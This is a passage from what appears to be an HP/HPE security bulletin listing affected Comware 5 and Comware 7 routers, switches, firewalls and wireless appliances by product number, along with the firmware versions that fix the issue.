MSR20-13 Router\n      - JF241A HP MSR20-12 Router\n      - JF806A HP MSR20-12-T Router\n      - JF807A HP MSR20-12-W Router\n      - JF808A HP MSR20-13-W Router\n      - JF809A HP MSR20-15-A-W Router\n      - JF817A HP MSR20-15 Router\n      - JG209A HP MSR20-12-T-W Router (NA)\n      - JG210A HP MSR20-13-W Router (NA)\n  + **MSR 30 (Comware 5) - Version: R2516**\n    * HP Network Products\n      - JD654A HP MSR30-60 POE Multi-Service Router\n      - JD657A HP MSR30-40 Multi-Service Router\n      - JD658A HP MSR30-60 Multi-Service Router\n      - JD660A HP MSR30-20 POE Multi-Service Router\n      - JD661A HP MSR30-40 POE Multi-Service Router\n      - JD666A HP MSR30-20 Multi-Service Router\n      - JF229A HP MSR30-40 Router\n      - JF230A HP MSR30-60 Router\n      - JF232A HP RTMSR3040-AC-OVSAS-H3\n      - JF235A HP MSR30-20 DC Router\n      - JF284A HP MSR30-20 Router\n      - JF287A HP MSR30-40 DC Router\n      - JF801A HP MSR30-60 DC Router\n      - JF802A HP MSR30-20 PoE Router\n      - JF803A HP MSR30-40 PoE Router\n      - JF804A HP MSR30-60 PoE Router\n      - JG728A HP MSR30-20 TAA-compliant DC Router\n      - JG729A HP MSR30-20 TAA-compliant Router\n  + **MSR 30-16 (Comware 5) - Version: R2516**\n    * HP Network Products\n      - JD659A HP MSR30-16 POE Multi-Service Router\n      - JD665A HP MSR30-16 Multi-Service Router\n      - JF233A HP MSR30-16 Router\n      - JF234A HP MSR30-16 PoE Router\n  + **MSR 30-1X (Comware 5) - Version: R2516**\n    * HP Network Products\n      - JF800A HP MSR30-11 Router\n      - JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr\n      - JG182A HP MSR30-11E Router\n      - JG183A HP MSR30-11F Router\n      - JG184A HP MSR30-10 DC Router\n  + **MSR 50 (Comware 5) - Version: R2516**\n    * HP Network Products\n      - JD433A HP MSR50-40 Router\n      - JD653A HP MSR50 Processor Module\n      - JD655A HP MSR50-40 Multi-Service Router\n      - JD656A HP MSR50-60 Multi-Service Router\n      - JF231A HP MSR50-60 Router\n      - JF285A HP MSR50-40 DC Router\n      - JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply\n  + **MSR 50-G2 (Comware 5) - Version: R2516**\n    * HP Network Products\n      - JD429A HP MSR50 G2 Processor Module\n      - JD429B HP MSR50 G2 Processor Module\n  + **MSR 9XX (Comware 5) - Version: R2516**\n    * HP Network Products\n      - JF812A HP MSR900 Router\n      - JF813A HP MSR920 Router\n      - JF814A HP MSR900-W Router\n      - JF815A HP MSR920 2FEWAN/8FELAN/.11 b/g Rtr\n      - JG207A HP MSR900-W Router (NA)\n      - JG208A HP MSR920-W Router (NA)\n  + **MSR 93X (Comware 5) - Version: R2516**\n    * HP Network Products\n      - JG511A HP MSR930 Router\n      - JG511B HP MSR930 Router\n      - JG512A HP MSR930 Wireless Router\n      - JG513A HP MSR930 3G Router\n      - JG513B HP MSR930 3G Router\n      - JG514A HP MSR931 Router\n      - JG514B HP MSR931 Router\n      - JG515A HP MSR931 3G Router\n      - JG516A HP MSR933 Router\n      - JG517A HP MSR933 3G Router\n      - JG518A HP MSR935 Router\n      - JG518B HP MSR935 Router\n      - JG519A HP MSR935 Wireless Router\n      - JG520A HP MSR935 3G Router\n      - JG531A HP MSR931 Dual 3G Router\n      - JG531B HP MSR931 Dual 3G Router\n      - JG596A HP MSR930 4G LTE/3G CDMA Router\n      - JG597A HP MSR936 Wireless Router\n      - JG665A HP MSR930 4G LTE/3G WCDMA Global Router\n      - JG704A HP MSR930 4G LTE/3G WCDMA  ATT Router\n      - JH009A HP MSR931 Serial (TI) Router\n      - JH010A HP MSR933 G.SHDSL (TI) Router\n      - JH011A HP MSR935 ADSL2+ (TI) Router\n      - JH012A HP MSR930 Wireless 802.11n (NA) Router\n      - JH012B HP MSR930 Wireless 802.11n (NA) Router\n      - JH013A HP MSR935 Wireless 802.11n (NA) Router\n  + **MSR1000 (Comware 5) - Version: See Mitigation**\n    * HP Network Products\n      - JG732A HP MSR1003-8 AC Router\n  + **12500 (Comware 5) - Version: R1829P02**\n    * HP Network Products\n      - JC072B HP 12500 Main Processing Unit\n      - JC085A HP A12518 Switch Chassis\n      - JC086A HP A12508 Switch Chassis\n      - JC652A HP 12508 DC Switch Chassis\n      - JC653A HP 12518 DC Switch Chassis\n      - JC654A HP 12504 AC Switch Chassis\n      - JC655A HP 12504 DC Switch Chassis\n      - JC808A HP 12500 TAA Main Processing Unit\n      - JF430A HP A12518 Switch Chassis\n      - JF430B HP 12518 Switch Chassis\n      - JF430C HP 12518 AC Switch Chassis\n      - JF431A HP A12508 Switch Chassis\n      - JF431B HP 12508 Switch Chassis\n      - JF431C HP 12508 AC Switch Chassis\n  + **9500E (Comware 5) - Version: R1829P02**\n    * HP Network Products\n      - JC124A HP A9508 Switch Chassis\n      - JC124B HP 9505 Switch Chassis\n      - JC125A HP A9512 Switch Chassis\n      - JC125B HP 9512 Switch Chassis\n      - JC474A HP A9508-V Switch Chassis\n      - JC474B HP 9508-V Switch Chassis\n  + **10500 (Comware 5) - Version: R1210P02**\n    * HP Network Products\n      - JC611A HP 10508-V Switch Chassis\n      - JC612A HP 10508 Switch Chassis\n      - JC613A HP 10504 Switch Chassis\n      - JC614A HP 10500 Main Processing Unit\n      - JC748A HP 10512 Switch Chassis\n      - JG375A HP 10500 TAA-compliant Main Processing Unit\n      - JG820A HP 10504 TAA-compliant Switch Chassis\n      - JG821A HP 10508 TAA-compliant Switch Chassis\n      - JG822A HP 10508-V TAA-compliant Switch Chassis\n      - JG823A HP 10512 TAA-compliant Switch Chassis\n  + **7500 (Comware 5) - Version: R6710P02**\n    * HP Network Products\n      - JC666A HP 7503-S 144Gbps Fabric/MPU with PoE Upgradable 20-port\nGig-T/4-port GbE Combo\n      - JC697A HP 7502 TAA-compliant Main Processing Unit\n      - JC698A HP 7503-S 144Gbps TAA Fabric / MPU with 16 GbE SFP Ports and 8\nGbE Combo Ports\n      - JC699A HP 7500 384Gbps TAA-compliant Fabric / MPU with 2 10GbE XFP\nPorts\n      - JC700A HP 7500 384Gbps TAA-compliant Fabric / Main Processing Unit\n      - JC701A HP 7500 768Gbps TAA-compliant Fabric / Main Processing Unit\n      - JD193A HP 7500 384Gbps Fabric Module with 2 XFP Ports\n      - JD193B HP 7500 384Gbps Fabric Module with 2 XFP Ports\n      - JD194A HP 7500 384Gbps Fabric Module\n      - JD194B HP 7500 384Gbps Fabric Module\n      - JD195A HP 7500 384Gbps Advanced Fabric Module\n      - JD196A HP 7502 Fabric Module\n      - JD220A HP 7500 768Gbps Fabric Module\n      - JD224A HP 7500 384Gbps Fabric Module with 12 SFP Ports\n      - JD238A HP 7510 Switch Chassis\n      - JD238B HP 7510 Switch Chassis\n      - JD239A HP 7506 Switch Chassis\n      - JD239B HP 7506 Switch Chassis\n      - JD240A HP 7503 Switch Chassis\n      - JD240B HP 7503 Switch Chassis\n      - JD241A HP 7506-V Switch Chassis\n      - JD241B HP 7506-V Switch Chassis\n      - JD242A HP 7502 Switch Chassis\n      - JD242B HP 7502 Switch Chassis\n      - JD243A HP 7503-S Switch Chassis with 1 Fabric Slot\n      - JD243B HP 7503-S Switch Chassis with 1 Fabric Slot\n      - JE164A HP E7902 Switch Chassis\n      - JE165A HP E7903 Switch Chassis\n      - JE166A HP E7903 1 Fabric Slot Switch Chassis\n      - JE167A HP E7906 Switch Chassis\n      - JE168A HP E7906 Vertical Switch Chassis\n      - JE169A HP E7910 Switch Chassis\n  + **6125G/XG Blade Switch - Version: R2112P05**\n    * HP Network Products\n      - 737220-B21 HP 6125G Blade Switch with TAA\n      - 737226-B21 HP 6125G/XG Blade Switch with TAA\n      - 658250-B21 HP 6125G/XG Blade Switch Opt Kit\n      - 658247-B21 HP 6125G Blade Switch Opt Kit\n  + **5830 (Comware 5) - Version: R1118P13**\n    * HP Network Products\n      - JC691A HP 5830AF-48G Switch with 1 Interface Slot\n      - JC694A HP 5830AF-96G Switch\n      - JG316A HP 5830AF-48G TAA-compliant Switch w/1 Interface Slot\n      - JG374A HP 5830AF-96G TAA-compliant Switch\n  + **5800 (Comware 5) - Version: R1810P03**\n    * HP Network Products\n      - JC099A HP 5800-24G-PoE Switch\n      - JC099B HP 5800-24G-PoE+ Switch\n      - JC100A HP 5800-24G Switch\n      - JC100B HP 5800-24G Switch\n      - JC101A HP 5800-48G Switch with 2 Slots\n      - JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots\n      - JC103A HP 5800-24G-SFP Switch\n      - JC103B HP 5800-24G-SFP Switch with 1 Interface Slot\n      - JC104A HP 5800-48G-PoE Switch\n      - JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot\n      - JC105A HP 5800-48G Switch\n      - JC105B HP 5800-48G Switch with 1 Interface Slot\n      - JG254A HP 5800-24G-PoE+ TAA-compliant Switch\n      - JG254B HP 5800-24G-PoE+ TAA-compliant Switch\n      - JG255A HP 5800-24G TAA-compliant Switch\n      - JG255B HP 5800-24G TAA-compliant Switch\n      - JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot\n      - JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot\n      - JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot\n      - JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot\n      - JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot\n      - JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot\n      - JG225A HP 5800AF-48G Switch\n      - JG225B HP 5800AF-48G Switch\n      - JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots\n      - JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface\n      - JG243A HP 5820-24XG-SFP+ TAA-compliant Switch\n      - JG243B HP 5820-24XG-SFP+ TAA-compliant Switch\n      - JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots\n\u0026 1 OAA Slot\n      - JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots\nand 1 OAA Slot\n      - JC106A HP 5820-14XG-SFP+ Switch with 2 Slots\n      - JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots \u0026 1 OAA Slot\n      - JG219A HP 5820AF-24XG Switch\n      - JG219B HP 5820AF-24XG Switch\n      - JC102A HP 5820-24XG-SFP+ Switch\n      - JC102B HP 5820-24XG-SFP+ Switch\n  + **5500 HI (Comware 5) - Version: R5501P21**\n    * HP Network Products\n      - JG311A HP 5500-24G-4SFP HI Switch with 2 Interface Slots\n      - JG312A HP 5500-48G-4SFP HI Switch with 2 Interface Slots\n      - JG541A HP 5500-24G-PoE+-4SFP HI Switch with 2 Interface Slots\n      - JG542A HP 5500-48G-PoE+-4SFP HI Switch with 2 Interface Slots\n      - JG543A HP 5500-24G-SFP HI Switch with 2 Interface Slots\n      - JG679A HP 5500-24G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface\nSlots\n      - JG680A HP 5500-48G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface\nSlots\n      - JG681A HP 5500-24G-SFP HI TAA-compliant Switch with 2 Interface Slots\n  + **5500 EI (Comware 5) - Version: R2221P22**\n    * HP Network Products\n      - JD373A HP 5500-24G DC EI Switch\n      - JD374A HP 5500-24G-SFP EI Switch\n      - JD375A HP 5500-48G EI Switch\n      - JD376A HP 5500-48G-PoE EI Switch\n      - JD377A HP 5500-24G EI Switch\n      - JD378A HP 5500-24G-PoE EI Switch\n      - JD379A HP 5500-24G-SFP DC EI Switch\n      - JG240A HP 5500-48G-PoE+ EI Switch with 2 Interface Slots\n      - JG241A HP 5500-24G-PoE+ EI Switch with 2 Interface Slots\n      - JG249A HP 5500-24G-SFP EI TAA-compliant Switch with 2 Interface\n      - JG250A HP 5500-24G EI TAA-compliant Switch with 2 Interface Slots\n      - JG251A HP 5500-48G EI TAA-compliant Switch with 2 Interface Slots\n      - JG252A HP 5500-24G-PoE+ EI TAA-compliant Switch with 2 Interface\nSlots\n      - JG253A HP 5500-48G-PoE+ EI TAA-compliant Switch with 2 Interface\nSlots\n  + **4800G (Comware 5) - Version: R2221P22**\n    * HP Network Products\n      - JD007A HP 4800-24G Switch\n      - JD008A HP 4800-24G-PoE Switch\n      - JD009A HP 4800-24G-SFP Switch\n      - JD010A HP 4800-48G Switch\n      - JD011A HP 4800-48G-PoE Switch\n  + **5500SI (Comware 5) - Version: R2221P22**\n    * HP Network Products\n      - JD369A HP 5500-24G SI Switch\n      - JD370A HP 5500-48G SI Switch\n      - JD371A HP 5500-24G-PoE SI Switch\n      - JD372A HP 5500-48G-PoE SI Switch\n      - JG238A HP 5500-24G-PoE+ SI Switch with 2 Interface Slots\n      - JG239A HP 5500-48G-PoE+ SI Switch with 2 Interface Slots\n  + **4500G (Comware 5) - Version: R2221P22**\n    * HP Network Products\n      - JF428A HP 4510-48G Switch\n      - JF847A HP 4510-24G Switch\n  + **5120 EI (Comware 5) - Version: R2221P22**\n    * HP Network Products\n      - JE066A HP 5120-24G EI Switch\n      - JE067A HP 5120-48G EI Switch\n      - JE068A HP 5120-24G EI Switch with 2 Interface Slots\n      - JE069A HP 5120-48G EI Switch with 2 Interface Slots\n      - JE070A HP 5120-24G-PoE EI 2-slot Switch\n      - JE071A HP 5120-48G-PoE EI 2-slot Switch\n      - JG236A HP 5120-24G-PoE+ EI Switch with 2 Interface Slots\n      - JG237A HP 5120-48G-PoE+ EI Switch with 2 Interface Slots\n      - JG245A HP 5120-24G EI TAA-compliant Switch with 2 Interface Slots\n      - JG246A HP 5120-48G EI TAA-compliant Switch with 2 Interface Slots\n      - JG247A HP 5120-24G-PoE+ EI TAA-compliant Switch with 2 Slots\n      - JG248A HP 5120-48G-PoE+ EI TAA-compliant Switch with 2 Slots\n  + **4210G (Comware 5) - Version: R2221P22**\n    * HP Network Products\n      - JF844A HP 4210-24G Switch\n      - JF845A HP 4210-48G Switch\n      - JF846A HP 4210-24G-PoE Switch\n  + **5120 SI (Comware 5) - Version: R1517**\n    * HP Network Products\n      - JE072A HP 5120-48G SI Switch\n      - JE072B HPE 5120 48G SI Switch\n      - JE073A HP 5120-16G SI Switch\n      - JE073B HPE 5120 16G SI Switch\n      - JE074A HP 5120-24G SI Switch\n      - JE074B HPE 5120 24G SI Switch\n      - JG091A HP 5120-24G-PoE+ (370W) SI Switch\n      - JG091B HPE 5120 24G PoE+ (370W) SI Switch\n      - JG092A HP 5120-24G-PoE+ (170W) SI Switch\n      - JG309B HPE 5120 8G PoE+ (180W) SI Switch\n      - JG310B HPE 5120 8G PoE+ (65W) SI Switch\n  + **3610 (Comware 5) - Version: R5319P15**\n    * HP Network Products\n      - JD335A HP 3610-48 Switch\n      - JD336A HP 3610-24-4G-SFP Switch\n      - JD337A HP 3610-24-2G-2G-SFP Switch\n      - JD338A HP 3610-24-SFP Switch\n  + **3600V2 (Comware 5) - Version: R2111P01**\n    * HP Network Products\n      - JG299A HP 3600-24 v2 EI Switch\n      - JG299B HP 3600-24 v2 EI Switch\n      - JG300A HP 3600-48 v2 EI Switch\n      - JG300B HP 3600-48 v2 EI Switch\n      - JG301A HP 3600-24-PoE+ v2 EI Switch\n      - JG301B HP 3600-24-PoE+ v2 EI Switch\n      - JG301C HP 3600-24-PoE+ v2 EI Switch\n      - JG302A HP 3600-48-PoE+ v2 EI Switch\n      - JG302B HP 3600-48-PoE+ v2 EI Switch\n      - JG302C HP 3600-48-PoE+ v2 EI Switch\n      - JG303A HP 3600-24-SFP v2 EI Switch\n      - JG303B HP 3600-24-SFP v2 EI Switch\n      - JG304A HP 3600-24 v2 SI Switch\n      - JG304B HP 3600-24 v2 SI Switch\n      - JG305A HP 3600-48 v2 SI Switch\n      - JG305B HP 3600-48 v2 SI Switch\n      - JG306A HP 3600-24-PoE+ v2 SI Switch\n      - JG306B HP 3600-24-PoE+ v2 SI Switch\n      - JG306C HP 3600-24-PoE+ v2 SI Switch\n      - JG307A HP 3600-48-PoE+ v2 SI Switch\n      - JG307B HP 3600-48-PoE+ v2 SI Switch\n      - JG307C HP 3600-48-PoE+ v2 SI Switch\n  + **3100V2 (Comware 5) - Version: R5213P01**\n    * HP Network Products\n      - JD313B HPE 3100 24 PoE v2 EI Switch\n      - JD318B HPE 3100 8 v2 EI Switch\n      - JD319B HPE 3100 16 v2 EI Switch\n      - JD320B HPE 3100 24 v2 EI Switch\n      - JG221A HPE 3100 8 v2 SI Switch\n      - JG222A HPE 3100 16 v2 SI Switch\n      - JG223A HPE 3100 24 v2 SI Switch\n  + **HP870 (Comware 5) - Version: R2607P51**\n    * HP Network Products\n      - JG723A HP 870 Unified Wired-WLAN Appliance\n      - JG725A HP 870 Unified Wired-WLAN TAA-compliant Appliance\n  + **HP850 (Comware 5) - Version: R2607P51**\n    * HP Network Products\n      - JG722A HP 850 Unified Wired-WLAN Appliance\n      - JG724A HP 850 Unified Wired-WLAN TAA-compliant Appliance\n  + **HP830 (Comware 5) - Version: R3507P51**\n    * HP Network Products\n      - JG640A HP 830 24-Port PoE+ Unified Wired-WLAN Switch\n      - JG641A HP 830 8-port PoE+ Unified Wired-WLAN Switch\n      - JG646A HP 830 24-Port PoE+ Unified Wired-WLAN TAA-compliant Switch\n      - JG647A HP 830 8-Port PoE+ Unified Wired-WLAN TAA-compliant\n  + **HP6000 (Comware 5) - Version: R2507P44**\n    * HP Network Products\n      - JG639A HP 10500/7500 20G Unified Wired-WLAN Module\n      - JG645A HP 10500/7500 20G Unified Wired-WLAN TAA-compliant Module\n  + **WX5004-EI (Comware 5) - Version: R2507P44**\n    * HP Network Products\n      - JD447B HP WX5002 Access Controller\n      - JD448A HP WX5004 Access Controller\n      - JD448B HP WX5004 Access Controller\n      - JD469A HP WX5004 Access Controller\n  + **SecBlade FW (Comware 5) - Version: R3181P07**\n    * HP Network Products\n      - JC635A HP 12500 VPN Firewall Module\n      - JD245A HP 9500 VPN Firewall Module\n      - JD249A HP 10500/7500 Advanced VPN Firewall Module\n      - JD250A HP 6600 Firewall Processing Router Module\n      - JD251A HP 8800 Firewall Processing Module\n      - JD255A HP 5820 VPN Firewall Module\n  + **F1000-E (Comware 5) - Version: TBD still fixing**\n    * HP Network Products\n      - JD272A HP F1000-E VPN Firewall Appliance\n  + **F1000-A-EI (Comware 5) - Version: TBD still fixing**\n    * HP Network Products\n      - JG214A HP F1000-A-EI VPN Firewall Appliance\n  + **F1000-S-EI (Comware 5) - Version: TBD still fixing**\n    * HP Network Products\n      - JG213A HP F1000-S-EI VPN Firewall Appliance\n  + **F5000-A (Comware 5) - Version: F3210P26**\n    * HP Network Products\n      - JD259A HP A5000-A5 VPN Firewall Chassis\n      - JG215A HP F5000 Firewall Main Processing Unit\n      - JG216A HP F5000 Firewall Standalone Chassis\n  + **U200S and CS (Comware 5) - Version: F5123P33**\n    * HP Network Products\n      - JD273A HP U200-S UTM Appliance\n  + **U200A and M (Comware 5) - Version: F5123P33**\n    * HP Network Products\n      - JD275A HP U200-A UTM Appliance\n  + **F5000-C/S (Comware 5) - Version: TBD still fixing**\n    * HP Network Products\n      - JG650A HP F5000-C VPN Firewall Appliance\n      - JG370A HP F5000-S VPN Firewall Appliance\n  + **SecBlade III (Comware 5) - Version: TBD still fixing**\n    * HP Network Products\n      - JG371A HP 12500 20Gbps VPN Firewall Module\n      - JG372A HP 10500/11900/7500 20Gbps VPN Firewall Module\n  + **6600 RSE RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n    * HP Network Products\n      - JC177A HP 6608 Router\n      - JC177B HP 6608 Router Chassis\n      - JC178A HP 6604 Router Chassis\n      - JC178B HP 6604 Router Chassis\n      - JC496A HP 6616 Router Chassis\n      - JC566A HP 6600 RSE-X1 Router Main Processing Unit\n      - JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit\n  + **6600 RPE RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n    * HP Network Products\n      - JC165A HP 6600 RPE-X1 Router Module\n      - JC177A HP 6608 Router\n      - JC177B HPE FlexNetwork 6608 Router Chassis\n      - JC178A HPE FlexNetwork 6604 Router Chassis\n      - JC178B HPE FlexNetwork 6604 Router Chassis\n      - JC496A HPE FlexNetwork 6616 Router Chassis\n      - JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit\n  + **6602 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n    * HP Network Products\n      - JC176A HP 6602 Router Chassis\n  + **HSR6602 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n    * HP Network Products\n      - JC177A HP 6608 Router\n      - JC177B HP 6608 Router Chassis\n      - JC178A HP 6604 Router Chassis\n      - JC178B HP 6604 Router Chassis\n      - JC496A HP 6616 Router Chassis\n      - JG353A HP HSR6602-G Router\n      - JG354A HP HSR6602-XG Router\n      - JG355A HP 6600 MCP-X1 Router Main Processing Unit\n      - JG356A HP 6600 MCP-X2 Router Main Processing Unit\n      - JG776A HP HSR6602-G TAA-compliant Router\n      - JG777A HP HSR6602-XG TAA-compliant Router\n      - JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit\n  + **HSR6800 RU (Comware 5 Low Encryption SW) - Version: R3303P28.RU**\n    * HP Network Products\n      - JG361A HP HSR6802 Router Chassis\n      - JG361B HP HSR6802 Router Chassis\n      - JG362A HP HSR6804 Router Chassis\n      - JG362B HP HSR6804 Router Chassis\n      - JG363A HP HSR6808 Router Chassis\n      - JG363B HP HSR6808 Router Chassis\n      - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit\n      - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit\n  + **SMB1910 (Comware 5) - Version: R1113**\n    * HP Network Products\n      - JG540A HP 1910-48 Switch\n      - JG539A HP 1910-24-PoE+ Switch\n      - JG538A HP 1910-24 Switch\n      - JG537A HP 1910-8 -PoE+ Switch\n      - JG536A HP 1910-8 Switch\n  + **SMB1920 (Comware 5) - Version: R1112**\n    * HP Network Products\n      - JG928A HP 1920-48G-PoE+ (370W) Switch\n      - JG927A HP 1920-48G Switch\n      - JG926A HP 1920-24G-PoE+ (370W) Switch\n      - JG925A HP 1920-24G-PoE+ (180W) Switch\n      - JG924A HP 1920-24G Switch\n      - JG923A HP 1920-16G Switch\n      - JG922A HP 1920-8G-PoE+ (180W) Switch\n      - JG921A HP 1920-8G-PoE+ (65W) Switch\n      - JG920A HP 1920-8G Switch\n  + **V1910 (Comware 5) - Version: R1517P01**\n    * HP Network Products\n      - JE005A HP 1910-16G Switch\n      - JE006A HP 1910-24G Switch\n      - JE007A HP 1910-24G-PoE (365W) Switch\n      - JE008A HP 1910-24G-PoE(170W) Switch\n      - JE009A HP 1910-48G Switch\n      - JG348A HP 1910-8G Switch\n      - JG349A HP 1910-8G-PoE+ (65W) Switch\n      - JG350A HP 1910-8G-PoE+ (180W) Switch\n  + **SMB 1620 (Comware 5) - Version: R1110**\n    * HP Network Products\n      - JG914A HP 1620-48G Switch\n      - JG913A HP 1620-24G Switch\n      - JG912A HP 1620-8G Switch\n  + **NJ5000 - Version: R1107**\n    * HP Network Products\n      - JH237A HPE FlexNetwork NJ5000 5G PoE+ Walljack\n\n\n**COMWARE 7 Products**\n\n  + **12500 (Comware 7) - Version: R7377**\n    * HP Network Products\n      - JC072B HP 12500 Main Processing Unit\n      - JC085A HP A12518 Switch Chassis\n      - JC086A HP A12508 Switch Chassis\n      - JC652A HP 12508 DC Switch Chassis\n      - JC653A HP 12518 DC Switch Chassis\n      - JC654A HP 12504 AC Switch Chassis\n      - JC655A HP 12504 DC Switch Chassis\n      - JF430A HP A12518 Switch Chassis\n      - JF430B HP 12518 Switch Chassis\n      - JF430C HP 12518 AC Switch Chassis\n      - JF431A HP A12508 Switch Chassis\n      - JF431B HP 12508 Switch Chassis\n      - JF431C HP 12508 AC Switch Chassis\n      - JG497A HP 12500 MPU w/Comware V7 OS\n      - JG782A HP FF 12508E AC Switch Chassis\n      - JG783A HP FF 12508E DC Switch Chassis\n      - JG784A HP FF 12518E AC Switch Chassis\n      - JG785A HP FF 12518E DC Switch Chassis\n      - JG802A HP FF 12500E MPU\n  + **10500 (Comware 7) - Version: R7180**\n    * HP Network Products\n      - JC611A HP 10508-V Switch Chassis\n      - JC612A HP 10508 Switch Chassis\n      - JC613A HP 10504 Switch Chassis\n      - JC748A HP 10512 Switch Chassis\n      - JG608A HP FlexFabric 11908-V Switch Chassis\n      - JG609A HP FlexFabric 11900 Main Processing Unit\n      - JG820A HP 10504 TAA Switch Chassis\n      - JG821A HP 10508 TAA Switch Chassis\n      - JG822A HP 10508-V TAA Switch Chassis\n      - JG823A HP 10512 TAA Switch Chassis\n      - JG496A HP 10500 Type A MPU w/Comware v7 OS\n      - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n      - JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System\nMain Processing Unit\n  + **12900 (Comware 7) - Version: R1150**\n    * HP Network Products\n      - JG619A HP FlexFabric 12910 Switch AC Chassis\n      - JG621A HP FlexFabric 12910 Main Processing Unit\n      - JG632A HP FlexFabric 12916 Switch AC Chassis\n      - JG634A HP FlexFabric 12916 Main Processing Unit\n      - JH104A HP FlexFabric 12900E Main Processing Unit\n      - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n      - JH263A HP FlexFabric 12904E Main Processing Unit\n      - JH255A HP FlexFabric 12908E Switch Chassis\n      - JH262A HP FlexFabric 12904E Switch Chassis\n      - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n      - JH103A HP FlexFabric 12916E Switch Chassis\n  + **5900 (Comware 7) - Version: R2432P01**\n    * HP Network Products\n      - JC772A HP 5900AF-48XG-4QSFP+ Switch\n      - JG296A HP 5920AF-24XG Switch\n      - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n      - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n      - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n      - JG555A HP 5920AF-24XG TAA Switch\n      - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n      - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n      - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n      - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n  + **MSR1000 (Comware 7) - Version: R0306P12**\n    * HP Network Products\n      - JG875A HP MSR1002-4 AC Router\n      - JH060A HP MSR1003-8S AC Router\n  + **MSR2000 (Comware 7) - Version: R0306P12**\n    * HP Network Products\n      - JG411A HP MSR2003 AC Router\n      - JG734A HP MSR2004-24 AC Router\n      - JG735A HP MSR2004-48 Router\n      - JG866A HP MSR2003 TAA-compliant AC Router\n  + **MSR3000 (Comware 7) - Version: R0306P12**\n    * HP Network Products\n      - JG404A HP MSR3064 Router\n      - JG405A HP MSR3044 Router\n      - JG406A HP MSR3024 AC Router\n      - JG407A HP MSR3024 DC Router\n      - JG408A HP MSR3024 PoE Router\n      - JG409A HP MSR3012 AC Router\n      - JG410A HP MSR3012 DC Router\n      - JG861A HP MSR3024 TAA-compliant AC Router\n  + **MSR4000 (Comware 7) - Version: R0306P12**\n    * HP Network Products\n      - JG402A HP MSR4080 Router Chassis\n      - JG403A HP MSR4060 Router Chassis\n      - JG412A HP MSR4000 MPU-100 Main Processing Unit\n      - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n  + **VSR (Comware 7) - Version: E0322P01**\n    * HP Network Products\n      - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n      - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n      - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n      - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n  + **7900 (Comware 7) - Version: R2150**\n    * HP Network Products\n      - JG682A HP FlexFabric 7904 Switch Chassis\n      - JG841A HP FlexFabric 7910 Switch Chassis\n      - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n      - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n      - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n      - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n      - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n      - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n  + **5130 (Comware 7) - Version: R3113P02**\n    * HP Network Products\n      - JG932A HP 5130-24G-4SFP+ EI Switch\n      - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n      - JG934A HP 5130-48G-4SFP+ EI Switch\n      - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n      - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n      - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n      - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n      - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n      - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n      - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n      - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n      - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n      - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n  + **6125XLG - Version: R2432P01**\n    * HP Network Products\n      - 711307-B21 HP 6125XLG Blade Switch\n      - 737230-B21 HP 6125XLG Blade Switch with TAA\n  + **6127XLG - Version: R2432P01**\n    * HP Network Products\n      - 787635-B21 